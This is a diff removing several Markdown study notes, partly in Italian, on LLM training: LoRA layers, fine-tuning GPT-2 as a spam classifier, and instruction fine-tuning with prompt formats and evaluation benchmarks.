-super().__init__()
-self.linear = linear
-self.lora = LoRALayer(
-linear.in_features, linear.out_features, rank, alpha
-)
-
-def forward(self, x):
-return self.linear(x) + self.lora(x)
-
-# Replace linear layers with LoRA ones
-def replace_linear_with_lora(model, rank, alpha):
-for name, module in model.named_children():
-if isinstance(module, torch.nn.Linear):
-# Replace the Linear layer with LinearWithLoRA
-setattr(model, name, LinearWithLoRA(module, rank, alpha))
-else:
-# Recursively apply the same function to child modules
-replace_linear_with_lora(module, rank, alpha)
-```
-## Riferimenti
-
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
--- a/src/todo/llm-training-data-preparation/7.1.-fine-tuning-for-classification.md
+++ b/src/todo/llm-training-data-preparation/7.1.-fine-tuning-for-classification.md
@ -1,117 +0,0 @@
-# 7.1. Fine-Tuning for Classification
-
-## What is
-
-Fine-tuning is the process of taking a **pre-trained model** that has learned **general language patterns** from vast amounts of data and **adapting** it to perform a **specific task** or to understand domain-specific language. This is achieved by continuing the training of the model on a smaller, task-specific dataset, allowing it to adjust its parameters to better suit the nuances of the new data while leveraging the broad knowledge it has already acquired. Fine-tuning enables the model to deliver more accurate and relevant results in specialized applications without the need to train a new model from scratch.
-
-> [!NOTE]
-> As pre-training a LLM that "understands" the text is pretty expensive it's usually easier and cheaper to to fine-tune open source pre-trained models to perform a specific task we want it to perform.
-
-> [!TIP]
-> The goal of this section is to show how to fine-tune an already pre-trained model so instead of generating new text the LLM will select give the **probabilities of the given text being categorized in each of the given categories** (like if a text is spam or not).
-
-## Preparing the data set
-
-### Data set size
-
-Of course, in order to fine-tune a model you need some structured data to use to specialise your LLM. In the example proposed in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb), GPT2 is fine tuned to detect if an email is spam or not using the data from [https://archive.ics.uci.edu/static/public/228/sms+spam+collection.zip](https://archive.ics.uci.edu/static/public/228/sms+spam+collection.zip)_._
-
-This data set contains much more examples of "not spam" that of "spam", therefore the book suggest to **only use as many examples of "not spam" as of "spam"** (therefore, removing from the training data all the extra examples). In this case, this was 747 examples of each.
-
-Then, **70%** of the data set is used for **training**, **10%** for **validation** and **20%** for **testing**.
-
- The **validation set** is used during the training phase to fine-tune the model's **hyperparameters** and make decisions about model architecture, effectively helping to prevent overfitting by providing feedback on how the model performs on unseen data. It allows for iterative improvements without biasing the final evaluation.
-  - This means that although the data included in this data set is not used for the training directly, it's used to tune the best **hyperparameters**, so this set cannot be used to evaluate the performance of the model like the testing one.
- In contrast, the **test set** is used **only after** the model has been fully trained and all adjustments are complete; it provides an unbiased assessment of the model's ability to generalize to new, unseen data. This final evaluation on the test set gives a realistic indication of how the model is expected to perform in real-world applications.
-
-### Entries length
-
-As the training example expects entries (emails text in this case) of the same length, it was decided to make every entry as large as the largest one by adding the ids of `<|endoftext|>` as padding.
-
-### Initialize the model
-
-Using the open-source pre-trained weights initialize the model to train. We have already done this before and follow the instructions of [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb) you can easily do it.
-
-## Classification head
-
-In this specific example (predicting if a text is spam or not), we are not interested in fine tune according to the complete vocabulary of GPT2 but we only want the new model to say if the email is spam (1) or not (0). Therefore, we are going to **modify the final layer that** gives the probabilities per token of the vocabulary for one that only gives the probabilities of being spam or not (so like a vocabulary of 2 words).
-
-```python
-# This code modified the final layer with a Linear one with 2 outs
-num_classes = 2
-model.out_head = torch.nn.Linear(
-
-in_features=BASE_CONFIG["emb_dim"],
-
-out_features=num_classes
-)
-```
-
-## Parameters to tune
-
-In order to fine tune fast it's easier to not fine tune all the parameters but only some final ones. This is because it's known that the lower layers generally capture basic language structures and semantics applicable. So, just **fine tuning the last layers is usually enough and faster**.
-
-```python
-# This code makes all the parameters of the model unrtainable
-for param in model.parameters():
-    param.requires_grad = False
-
-# Allow to fine tune the last layer in the transformer block
-for param in model.trf_blocks[-1].parameters():
-    param.requires_grad = True
-
-# Allow to fine tune the final layer norm
-for param in model.final_norm.parameters():
-
-param.requires_grad = True
-```
-
-## Entries to use for training
-
-In previos sections the LLM was trained reducing the loss of every predicted token, even though almost all the predicted tokens were in the input sentence (only 1 at the end was really predicted) in order for the model to understand better the language.
-
-In this case we only care on the model being able to predict if the model is spam or not, so we only care about the last token predicted. Therefore, it's needed to modify out previous training loss functions to only take into account that token.
-
-This is implemented in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb) as:
-
-```python
-def calc_accuracy_loader(data_loader, model, device, num_batches=None):
-    model.eval()
-    correct_predictions, num_examples = 0, 0
-
-    if num_batches is None:
-        num_batches = len(data_loader)
-    else:
-        num_batches = min(num_batches, len(data_loader))
-    for i, (input_batch, target_batch) in enumerate(data_loader):
-        if i < num_batches:
-            input_batch, target_batch = input_batch.to(device), target_batch.to(device)
-
-            with torch.no_grad():
-                logits = model(input_batch)[:, -1, :]  # Logits of last output token
-            predicted_labels = torch.argmax(logits, dim=-1)
-
-            num_examples += predicted_labels.shape[0]
-            correct_predictions += (predicted_labels == target_batch).sum().item()
-        else:
-            break
-    return correct_predictions / num_examples
-
-
-def calc_loss_batch(input_batch, target_batch, model, device):
-    input_batch, target_batch = input_batch.to(device), target_batch.to(device)
-    logits = model(input_batch)[:, -1, :]  # Logits of last output token
-    loss = torch.nn.functional.cross_entropy(logits, target_batch)
-    return loss
-```
-
-Note how for each batch we are only interested in the **logits of the last token predicted**.
-
-## Complete GPT2 fine-tune classification code
-
-You can find all the code to fine-tune GPT2 to be a spam classifier in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/load-finetuned-model.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/load-finetuned-model.ipynb)
-
-## References
-
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
-
--- a/src/todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md
+++ b/src/todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md
@ -1,100 +0,0 @@
-# 7.2. Ottimizzazione per seguire istruzioni
-
-> [!TIP]
-> L'obiettivo di questa sezione è mostrare come **ottimizzare un modello già pre-addestrato per seguire istruzioni** piuttosto che generare semplicemente testo, ad esempio, rispondendo a compiti come un chatbot.
-
-## Dataset
-
-Per ottimizzare un LLM per seguire istruzioni è necessario avere un dataset con istruzioni e risposte per ottimizzare il LLM. Ci sono diversi formati per addestrare un LLM a seguire istruzioni, ad esempio:
-
- L'esempio dello stile di prompt Apply Alpaca:
-```csharp
-Below is an instruction that describes a task. Write a response that appropriately completes the request.
-
-### Instruction:
-Calculate the area of a circle with a radius of 5 units.
-
-### Response:
-The area of a circle is calculated using the formula \( A = \pi r^2 \). Plugging in the radius of 5 units:
-
-\( A = \pi (5)^2 = \pi \times 25 = 25\pi \) square units.
-```
- Esempio di Stile Prompt Phi-3:
-```vbnet
-<|User|>
-Can you explain what gravity is in simple terms?
-
-<|Assistant|>
-Absolutely! Gravity is a force that pulls objects toward each other.
-```
-Addestrare un LLM con questo tipo di set di dati invece di semplici testi grezzi aiuta il LLM a capire che deve fornire risposte specifiche alle domande che riceve.
-
-Pertanto, una delle prime cose da fare con un set di dati che contiene richieste e risposte è modellare quei dati nel formato di prompt desiderato, come:
-```python
-# Code from https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/ch07.ipynb
-def format_input(entry):
-instruction_text = (
-f"Below is an instruction that describes a task. "
-f"Write a response that appropriately completes the request."
-f"\n\n### Instruction:\n{entry['instruction']}"
-)
-
-input_text = f"\n\n### Input:\n{entry['input']}" if entry["input"] else ""
-
-return instruction_text + input_text
-
-model_input = format_input(data[50])
-
-desired_response = f"\n\n### Response:\n{data[50]['output']}"
-
-print(model_input + desired_response)
-```
-Poi, come sempre, è necessario separare il dataset in set per l'addestramento, la validazione e il test.
-
-## Batching & Data Loaders
-
-Poi, è necessario raggruppare tutti gli input e gli output attesi per l'addestramento. Per questo, è necessario:
-
- Tokenizzare i testi
- Aggiungere padding a tutti i campioni alla stessa lunghezza (di solito la lunghezza sarà grande quanto la lunghezza del contesto utilizzato per pre-addestrare il LLM)
- Creare i token attesi spostando di 1 l'input in una funzione di collate personalizzata
- Sostituire alcuni token di padding con -100 per escluderli dalla perdita di addestramento: Dopo il primo token `endoftext`, sostituire tutti gli altri token `endoftext` con -100 (perché usare `cross_entropy(...,ignore_index=-100)` significa che ignorerà i target con -100)
- \[Opzionale] Mascherare usando -100 anche tutti i token appartenenti alla domanda in modo che il LLM impari solo a generare la risposta. Nello stile Apply Alpaca questo significherà mascherare tutto fino a `### Response:`
-
-Con questo creato, è tempo di creare i data loader per ciascun dataset (addestramento, validazione e test).
-
-## Load pre-trained LLM & Fine tune & Loss Checking
-
-È necessario caricare un LLM pre-addestrato per affinare. Questo è già stato discusso in altre pagine. Poi, è possibile utilizzare la funzione di addestramento precedentemente utilizzata per affinare il LLM.
-
-Durante l'addestramento è anche possibile vedere come la perdita di addestramento e la perdita di validazione variano durante le epoche per vedere se la perdita si sta riducendo e se si sta verificando overfitting.\
-Ricorda che l'overfitting si verifica quando la perdita di addestramento si sta riducendo ma la perdita di validazione non si sta riducendo o addirittura aumentando. Per evitare questo, la cosa più semplice da fare è fermare l'addestramento all'epoca in cui inizia questo comportamento.
-
-## Response Quality
-
-Poiché questo non è un fine-tuning di classificazione in cui è possibile fidarsi maggiormente delle variazioni di perdita, è anche importante controllare la qualità delle risposte nel set di test. Pertanto, è consigliato raccogliere le risposte generate da tutti i set di test e **controllare manualmente la loro qualità** per vedere se ci sono risposte sbagliate (nota che è possibile per il LLM creare correttamente il formato e la sintassi della frase di risposta ma fornire una risposta completamente errata. La variazione della perdita non rifletterà questo comportamento).\
-Nota che è anche possibile eseguire questa revisione passando le risposte generate e le risposte attese a **altri LLM e chiedere loro di valutare le risposte**.
-
-Altri test da eseguire per verificare la qualità delle risposte:
-
-1. **Measuring Massive Multitask Language Understanding (**[**MMLU**](https://arxiv.org/abs/2009.03300)**):** MMLU valuta la conoscenza e le capacità di problem-solving di un modello in 57 soggetti, comprese le scienze umane, le scienze e altro. Utilizza domande a scelta multipla per valutare la comprensione a vari livelli di difficoltà, dall'elementare all'avanzato professionale.
-2. [**LMSYS Chatbot Arena**](https://arena.lmsys.org): Questa piattaforma consente agli utenti di confrontare le risposte di diversi chatbot fianco a fianco. Gli utenti inseriscono un prompt e più chatbot generano risposte che possono essere confrontate direttamente.
-3. [**AlpacaEval**](https://github.com/tatsu-lab/alpaca_eval)**:** AlpacaEval è un framework di valutazione automatizzato in cui un LLM avanzato come GPT-4 valuta le risposte di altri modelli a vari prompt.
-4. **General Language Understanding Evaluation (**[**GLUE**](https://gluebenchmark.com/)**):** GLUE è una raccolta di nove compiti di comprensione del linguaggio naturale, tra cui analisi del sentiment, implicazione testuale e risposta a domande.
-5. [**SuperGLUE**](https://super.gluebenchmark.com/)**:** Basato su GLUE, SuperGLUE include compiti più impegnativi progettati per essere difficili per i modelli attuali.
-6. **Beyond the Imitation Game Benchmark (**[**BIG-bench**](https://github.com/google/BIG-bench)**):** BIG-bench è un benchmark su larga scala con oltre 200 compiti che testano le capacità di un modello in aree come ragionamento, traduzione e risposta a domande.
-7. **Holistic Evaluation of Language Models (**[**HELM**](https://crfm.stanford.edu/helm/lite/latest/)**):** HELM fornisce una valutazione completa attraverso vari metriche come accuratezza, robustezza e equità.
-8. [**OpenAI Evals**](https://github.com/openai/evals)**:** Un framework di valutazione open-source di OpenAI che consente di testare modelli AI su compiti personalizzati e standardizzati.
-9. [**HumanEval**](https://github.com/openai/human-eval)**:** Una raccolta di problemi di programmazione utilizzati per valutare le capacità di generazione di codice dei modelli di linguaggio.
-10. **Stanford Question Answering Dataset (**[**SQuAD**](https://rajpurkar.github.io/SQuAD-explorer/)**):** SQuAD consiste in domande su articoli di Wikipedia, dove i modelli devono comprendere il testo per rispondere accuratamente.
-11. [**TriviaQA**](https://nlp.cs.washington.edu/triviaqa/)**:** Un dataset su larga scala di domande e risposte trivia, insieme a documenti di prova.
-
-e molti altri
-
-## Follow instructions fine-tuning code
-
-Puoi trovare un esempio del codice per eseguire questo fine-tuning in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/gpt_instruction_finetuning.py](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/gpt_instruction_finetuning.py)
-
-## References
-
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
--- a/src/todo/llm-training-data-preparation/README.md
+++ b/src/todo/llm-training-data-preparation/README.md
@ -1,98 +0,0 @@
-# LLM Training - Data Preparation
-
-**Queste sono le mie note dal libro molto raccomandato** [**https://www.manning.com/books/build-a-large-language-model-from-scratch**](https://www.manning.com/books/build-a-large-language-model-from-scratch) **con alcune informazioni extra.**
-
-## Basic Information
-
-Dovresti iniziare leggendo questo post per alcuni concetti di base che dovresti conoscere:
-
-{{#ref}}
-0.-basic-llm-concepts.md
-{{#endref}}
-
-## 1. Tokenization
-
-> [!TIP]
-> L'obiettivo di questa fase iniziale è molto semplice: **Dividere l'input in token (ids) in un modo che abbia senso**.
-
-{{#ref}}
-1.-tokenizing.md
-{{#endref}}
-
-## 2. Data Sampling
-
-> [!TIP]
-> L'obiettivo di questa seconda fase è molto semplice: **Campionare i dati di input e prepararli per la fase di addestramento solitamente separando il dataset in frasi di una lunghezza specifica e generando anche la risposta attesa.**
-
-{{#ref}}
-2.-data-sampling.md
-{{#endref}}
-
-## 3. Token Embeddings
-
-> [!TIP]
-> L'obiettivo di questa terza fase è molto semplice: **Assegnare a ciascuno dei token precedenti nel vocabolario un vettore delle dimensioni desiderate per addestrare il modello.** Ogni parola nel vocabolario sarà un punto in uno spazio di X dimensioni.\
-> Nota che inizialmente la posizione di ogni parola nello spazio è semplicemente inizializzata "randomicamente" e queste posizioni sono parametri addestrabili (saranno migliorati durante l'addestramento).
->
-> Inoltre, durante l'embedding dei token **viene creata un'altra layer di embeddings** che rappresenta (in questo caso) la **posizione assoluta della parola nella frase di addestramento**. In questo modo, una parola in posizioni diverse nella frase avrà una rappresentazione (significato) diversa.
-
-{{#ref}}
-3.-token-embeddings.md
-{{#endref}}
-
-## 4. Attention Mechanisms
-
-> [!TIP]
-> L'obiettivo di questa quarta fase è molto semplice: **Applicare alcuni meccanismi di attenzione**. Questi saranno molti **layer ripetuti** che andranno a **catturare la relazione di una parola nel vocabolario con i suoi vicini nella frase attuale utilizzata per addestrare il LLM**.\
-> Vengono utilizzati molti layer per questo, quindi molti parametri addestrabili andranno a catturare queste informazioni.
-
-{{#ref}}
-4.-attention-mechanisms.md
-{{#endref}}
-
-## 5. LLM Architecture
-
-> [!TIP]
-> L'obiettivo di questa quinta fase è molto semplice: **Sviluppare l'architettura del LLM completo**. Metti tutto insieme, applica tutti i layer e crea tutte le funzioni per generare testo o trasformare testo in IDs e viceversa.
->
-> Questa architettura sarà utilizzata sia per l'addestramento che per la previsione del testo dopo che è stato addestrato.
-
-{{#ref}}
-5.-llm-architecture.md
-{{#endref}}
-
-## 6. Pre-training & Loading models
-
-> [!TIP]
-> L'obiettivo di questa sesta fase è molto semplice: **Addestrare il modello da zero**. Per questo verrà utilizzata l'architettura LLM precedente con alcuni cicli sui dataset utilizzando le funzioni di perdita e l'ottimizzatore definiti per addestrare tutti i parametri del modello.
-
-{{#ref}}
-6.-pre-training-and-loading-models.md
-{{#endref}}
-
-## 7.0. LoRA Improvements in fine-tuning
-
-> [!TIP]
-> L'uso di **LoRA riduce notevolmente il calcolo** necessario per **ottimizzare** modelli già addestrati.
-
-{{#ref}}
-7.0.-lora-improvements-in-fine-tuning.md
-{{#endref}}
-
-## 7.1. Fine-Tuning for Classification
-
-> [!TIP]
-> L'obiettivo di questa sezione è mostrare come ottimizzare un modello già pre-addestrato in modo che, invece di generare nuovo testo, il LLM fornisca le **probabilità che il testo fornito venga categorizzato in ciascuna delle categorie date** (come se un testo fosse spam o meno).
-
-{{#ref}}
-7.1.-fine-tuning-for-classification.md
-{{#endref}}
-
-## 7.2. Fine-Tuning to follow instructions
-
-> [!TIP]
-> L'obiettivo di questa sezione è mostrare come **ottimizzare un modello già pre-addestrato per seguire istruzioni** piuttosto che semplicemente generare testo, ad esempio, rispondendo a compiti come un chatbot.
-
-{{#ref}}
-7.2.-fine-tuning-to-follow-instructions.md
-{{#endref}}